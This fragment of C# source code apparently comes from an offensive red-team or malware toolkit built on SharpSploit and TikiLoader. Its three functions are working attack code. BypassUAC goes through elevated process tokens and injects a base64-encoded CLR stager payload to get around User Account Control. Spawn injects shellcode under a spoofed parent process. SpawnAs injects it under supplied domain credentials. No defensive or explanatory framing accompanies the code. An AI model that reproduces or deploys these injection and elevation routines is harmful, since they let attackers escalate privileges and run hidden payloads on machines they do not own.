public static bool BypassUAC(string binary, string path, string arguments)
{
SharpSploit.Credentials.Tokens t = new SharpSploit.Credentials.Tokens();
List <Process> processes = GetUserProcessTokens(true).Select(UPT => UPT.Process).ToList();
Console.WriteLine("Elevated processes: " + processes.Count);
foreach (Process process in processes)
{
// Get PrimaryToken
//Inject CLR and run stager
byte[] payload = DecompressDLL(Convert.FromBase64String(nutclr));
try
{
var ldr = new TikiLoader.Loader();
ldr.LoadElevated(binary, payload, process.Id);
return(t.RevertToSelf());
}
catch (Exception)
{
t.RevertToSelf();
continue;
}
}
return(false);
}
public static bool Spawn(string binary, string shellcode, int ppid)
{
//Inject CLR and run stager
byte[] payload = DecompressDLL(Convert.FromBase64String(shellcode));
try
{
var ldr = new TikiLoader.Loader();
ldr.Load(binary, payload, ppid);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
return(false);
}
return(true);
}
public static bool SpawnAs(string binary, string shellcode, string domain, string username, string password)
{
//Inject CLR and run stager
byte[] payload = DecompressDLL(Convert.FromBase64String(shellcode));
try
{
var ldr = new TikiLoader.Loader();
if (string.IsNullOrEmpty(domain))
{
domain = ".";
}
ldr.LoadAs(binary, payload, domain, username, password);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
return(false);
}
return(true);
}
